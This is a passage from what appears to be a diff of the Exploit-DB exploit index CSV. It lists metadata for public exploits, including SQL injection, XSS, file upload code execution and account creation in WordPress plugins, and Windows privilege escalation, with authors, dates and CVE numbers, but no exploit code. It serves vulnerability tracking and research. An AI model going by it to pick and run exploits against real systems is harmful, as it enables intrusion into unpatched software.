21271,exploits/php/webapps/21271.txt,"Webify Photo Gallery - Arbitrary File Deletion",2012-09-12,JIKO,webapps,php,,2012-09-12,2012-09-12,1,OSVDB-85662,,,,,
51736,exploits/php/webapps/51736.txt,"WEBIGniter v28.7.23 File Upload - Remote Code Execution",2023-10-09,nu11secur1ty,webapps,php,,2023-10-09,2023-10-09,0,,,,,,
51616,exploits/php/webapps/51616.txt,"Webile v1.0.1 - Multiple Cross Site Scripting",2023-07-20,Vulnerability-Lab,webapps,php,,2023-07-20,2023-07-20,0,,,,,,
47199,exploits/php/webapps/47199.txt,"WebIncorp ERP - SQL injection",2019-08-01,n1x_,webapps,php,80,2019-08-01,2019-08-02,0,,"SQL Injection (SQLi)",,,,
46350,exploits/php/webapps/46350.txt,"Webiness Inventory 2.3 - 'email' SQL Injection",2019-02-11,"Mehmet EMIROGLU",webapps,php,80,2019-02-11,2019-02-12,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comwebiness_inventory-2.3.zip,
@ -33177,6 +33196,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
36466,exploits/php/webapps/36466.txt,"WordPress Plugin Marketplace 2.4.0 - Arbitrary File Download",2015-03-22,"Kacper Szurek",webapps,php,,2015-03-24,2015-03-24,0,CVE-2014-9014;CVE-2014-9013;OSVDB-115631,,,,,
36490,exploits/php/webapps/36490.py,"WordPress Plugin Marketplace 2.4.0 - Remote Code Execution (Add Admin)",2015-03-25,"Claudio Viviani",webapps,php,,2015-03-25,2016-10-27,0,CVE-2014-9014;OSVDB-115631;CVE-2014-9013,,,,,
18988,exploits/php/webapps/18988.php,"WordPress Plugin Marketplace Plugin 1.5.0 < 1.6.1 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",webapps,php,,2012-06-05,2012-06-05,1,OSVDB-81143,"WordPress Plugin",,,http://www.exploit-db.comwpmarketplace.zip,
51735,exploits/php/webapps/51735.py,"Wordpress Plugin Masterstudy LMS - 3.0.17 - Unauthenticated Instructor Account Creation",2023-10-09,"Revan Arifio",webapps,php,,2023-10-09,2023-10-09,0,CVE-2023-4278,,,,,
50752,exploits/php/webapps/50752.txt,"WordPress Plugin MasterStudy LMS 2.7.5 - Unauthenticated Admin Account Creation",2022-02-18,"numan türle",webapps,php,,2022-02-18,2022-02-18,0,CVE-2022-0441,,,,,
24889,exploits/php/webapps/24889.txt,"WordPress Plugin Mathjax Latex 1.1 - Cross-Site Request Forgery",2013-03-26,"Junaid Hussain",webapps,php,,2013-03-26,2013-03-26,1,OSVDB-91737,"WordPress Plugin",,http://www.exploit-db.com/screenshots/idlt25000/screen-shot-2013-03-26-at-105329-am.png,,
37907,exploits/php/webapps/37907.txt,"WordPress Plugin MDC Private Message 1.0.0 - Persistent Cross-Site Scripting",2015-08-21,"Chris Kellum",webapps,php,80,2015-08-21,2015-08-21,0,CVE-2015-6805;OSVDB-126598,"WordPress Plugin",,,http://www.exploit-db.commdc-private-message.zip,
@ -33810,6 +33830,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
37406,exploits/php/webapps/37406.php,"WordPress Plugin Zingiri Web Shop 2.4.3 - 'uploadfilexd.php' Arbitrary File Upload",2012-06-14,"Sammy FORGIT",webapps,php,,2012-06-14,2015-06-28,1,,"WordPress Plugin",,,,https://www.securityfocus.com/bid/54020/info
37200,exploits/php/webapps/37200.txt,"WordPress Plugin zM Ajax Login & Register 1.0.9 - Local File Inclusion",2015-06-04,"Panagiotis Vagenas",webapps,php,80,2015-06-04,2015-06-04,0,CVE-2015-4465;OSVDB-122910;CVE-2015-4153,"WordPress Plugin",,,,
17778,exploits/php/webapps/17778.txt,"WordPress Plugin Zotpress 4.4 - SQL Injection",2011-09-04,"Miroslav Stampar",webapps,php,,2011-09-04,2011-09-04,1,,"WordPress Plugin",,,http://www.exploit-db.comzotpress.4.4.zip,
51739,exploits/php/webapps/51739.txt,"Wordpress Sonaar Music Plugin 4.7 - Stored XSS",2023-10-09,"Furkan Karaarslan",webapps,php,,2023-10-09,2023-10-09,0,,,,,,
49115,exploits/php/webapps/49115.txt,"Wordpress Theme Accesspress Social Icons 1.7.9 - SQL injection (Authenticated)",2020-11-27,SunCSR,webapps,php,,2020-11-27,2020-11-27,0,,,,,,
34578,exploits/php/webapps/34578.txt,"WordPress Theme Acento - 'view-pdf.php?File' Arbitrary File Download",2014-09-08,alieye,webapps,php,80,2014-09-08,2014-09-08,0,OSVDB-110832,,,,,
38568,exploits/php/webapps/38568.txt,"WordPress Theme Ambience - 'src' Cross-Site Scripting",2013-06-09,Darksnipper,webapps,php,,2013-06-09,2015-10-30,1,,,,,,https://www.securityfocus.com/bid/60458/info
@ -40772,6 +40793,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
47684,exploits/windows/local/47684.md,"Microsoft Windows 10 Build 1803 < 1903 - 'COMahawk' Local Privilege Escalation",2019-11-14,TomahawkAPT69,local,windows,,2019-11-19,2019-11-19,0,CVE-2019-1405;CVE-2019-1322,,,,,https://github.com/apt69/COMahawk
47915,exploits/windows/local/47915.py,"Microsoft Windows 10 build 1809 - Local Privilege Escalation (UAC Bypass)",2020-01-13,"Nassim Asrir",local,windows,,2020-01-13,2020-01-13,0,,,,,,
47115,exploits/windows/local/47115.txt,"Microsoft Windows 10.0.17134.648 - HTTP -> SMB NTLM Reflection Leads to Privilege Elevation",2019-07-12,"Google Security Research",local,windows,,2019-07-12,2019-07-12,1,CVE-2019-1019,Local,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1817
51733,exploits/windows/local/51733.txt,"Microsoft Windows 11 - 'apds.dll' DLL hijacking (Forced)",2023-10-09,"Moein Shahabi",local,windows,,2023-10-09,2023-10-09,0,,,,,,
40219,exploits/windows/local/40219.txt,"Microsoft Windows 7 (x86/x64) - Group Policy Privilege Escalation (MS16-072)",2016-08-08,"Nabeel Ahmed",local,windows,,2016-08-08,2016-08-08,1,CVE-2016-3223;MS16-072,,,,,
14733,exploits/windows/local/14733.c,"Microsoft Windows 7 - 'wab32res.dll wab.exe' DLL Hijacking",2010-08-24,TheLeader,local,windows,,2010-08-25,2010-08-25,0,CVE-2010-3147;OSVDB-67553;CVE-2010-3143;OSVDB-67499,,,,,
39788,exploits/windows/local/39788.txt,"Microsoft Windows 7 - 'WebDAV' Local Privilege Escalation (MS16-016) (2)",2016-05-09,hex0r,local,windows,,2016-05-09,2016-10-10,1,CVE-2016-0051;MS16-016,,,http://www.exploit-db.com/screenshots/idlt40000/eop2.png,,

Can't render this file because it is too large.